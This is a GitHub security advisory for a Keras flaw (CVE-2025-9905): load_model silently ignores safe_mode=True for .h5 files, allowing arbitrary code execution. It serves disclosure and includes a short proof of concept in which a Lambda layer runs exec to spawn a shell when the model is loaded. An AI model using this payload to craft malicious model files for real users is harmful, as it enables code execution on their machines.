Skip to content

The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

High severity GitHub Reviewed Published Sep 19, 2025 in keras-team/keras • Updated Sep 19, 2025

Package

pip keras (pip)

Affected versions

>= 3.0.0, < 3.11.3

Patched versions

3.11.3

Description

Note: This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I’ve chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your SECURITY.md, but received no response.


Summary

When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim’s machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not require any sophisticated technique—.h5 and .hdf5 files are simply not checked for unsafe code execution.

From this point on, I will refer only to the .h5 file format, though everything equally applies to .hdf5.

Details

Intended behaviour

According to the official Keras documentation, safe_mode is defined as:

safe_mode: Boolean, whether to disallow unsafe lambda deserialization. When safe_mode=False, loading an object has the potential to trigger arbitrary code execution. This argument is only applicable to the Keras v3 model format. Defaults to True.

I understand that the behavior described in this report is somehow intentional, as safe_mode is only applicable to .keras models.

However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. .h5 files can still be loaded seamlessly using load_model with safe_mode=True, and the absence of any warning or error creates a false sense of security. Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if safe_mode cannot be applied to a given file format, an explicit error should be raised to alert the user.

This issue is particularly critical given the widespread use of the .h5 format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a .h5 file with safe_mode=True. None of them expected the setting to be silently ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers—experts in binary or ML security—and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

Technical Details

Examining the implementation of load_model in keras/src/saving/saving_api.py, we can see that the safe_mode parameter is completely ignored when loading .h5 files. Here's the relevant snippet:

def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )

As shown, when the file format is .h5 or .hdf5, the method delegates to legacy_h5_format.load_model_from_hdf5, which does not use or check the safe_mode parameter at all.

Solution

Since the release of the new .keras format, I believe the simplest and most effective way to address this misleading behavior—and to improve security in Keras—is to have the safe_mode parameter raise an explicit error when safe_mode=True is used with .h5/.hdf5 files. This error should be clear and informative, explaining that the legacy format does not support safe_mode and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations.

If you confirm that you're open to this approach, I’d be happy to open a PR that includes the missing check.

PoC

From the attacker’s perspective, creating a malicious .h5 model is as simple as the following:

import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()

keras.saving.save_model(model, "./provola.h5")

From the victim’s side, triggering code execution is just as simple:

import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)

That’s all. The exploit occurs during model loading, with no further interaction required. The parameters passed to the method do not mitigate of influence the attack in any way.

As expected, the attacker can substitute the exec(...) call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

Attack scenario

The attacker may distribute a malicious .h5/.hdf5 model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model—even with safe_mode=True that would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim’s machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.

References

@hertschuh hertschuh published to keras-team/keras Sep 19, 2025
Published to the GitHub Advisory Database Sep 19, 2025
Reviewed Sep 19, 2025
Last updated Sep 19, 2025

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Local
Attack Complexity Low
Attack Requirements Present
Privileges Required None
User interaction Active
Vulnerable System Impact Metrics
Confidentiality High
Integrity High
Availability High
Subsequent System Impact Metrics
Confidentiality High
Integrity High
Availability High

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(0th percentile)

Weaknesses

Improper Control of Dynamically-Managed Code Resources

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements. Learn more on MITRE.

CVE ID

CVE-2025-9905

GHSA ID

GHSA-36rr-ww3j-vrjv

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.